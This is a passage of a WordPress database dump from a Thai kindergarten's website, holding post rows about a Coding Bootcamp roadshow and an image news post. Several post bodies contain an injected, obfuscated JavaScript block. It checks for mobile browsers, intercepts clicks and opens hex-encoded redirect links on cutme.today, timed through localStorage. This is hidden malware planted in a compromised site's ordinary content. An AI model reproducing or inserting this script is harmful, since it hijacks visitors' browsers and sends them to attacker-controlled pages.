_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญโรงเรียนอนุบาลวัดพระโต ได้เยี่ยมชมและให้กำลังนักเรียนและครูผู้เข้าร่วมกิจกรรม Coding Bootcamp &amp; Roadshow ภาคอีสานตอนล่าง ณ จังหวัดอุบลราชธานี','','inherit','closed','closed','','116-revision-v1','','','2024-07-29 18:49:14','2024-07-29 11:49:14','',116,'http://watprato.ssk.in.th/?p=118',0,'revision','',0),
(119,1,'2024-07-29 18:49:57','2024-07-29 11:49:57','<!-- wp:generateblocks/image {\"uniqueId\":\"807d329c\",\"mediaId\":120,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-807d329c\"><img class=\"gb-image gb-image-807d329c\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/451103441_122163133106202781_910918089894319615_n.jpg\" alt=\"\" title=\"451103441_122163133106202781_910918089894319615_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','จดหมายข่าวประชาสัมพันธ์','','publish','open','open','','%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98-2','','','2024-07-29 18:49:59','2024-07-29 11:49:59','',0,'http://watprato.ssk.in.th/?p=119',0,'post','',0),
(120,1,'2024-07-29 18:49:46','2024-07-29 11:49:46','','451103441_122163133106202781_910918089894319615_n','','inherit','open','closed','','451103441_122163133106202781_910918089894319615_n','','','2024-07-29 18:49:46','2024-07-29 11:49:46','',119,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/451103441_122163133106202781_910918089894319615_n.jpg',0,'attachment','image/jpeg',0),
(121,1,'2024-07-29 18:49:57','2024-07-29 11:49:57','<!-- wp:generateblocks/image {\"uniqueId\":\"807d329c\",\"mediaId\":120,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-807d329c\"><img class=\"gb-image gb-image-807d329c\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/451103441_122163133106202781_910918089894319615_n.jpg\" alt=\"\" title=\"451103441_122163133106202781_910918089894319615_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 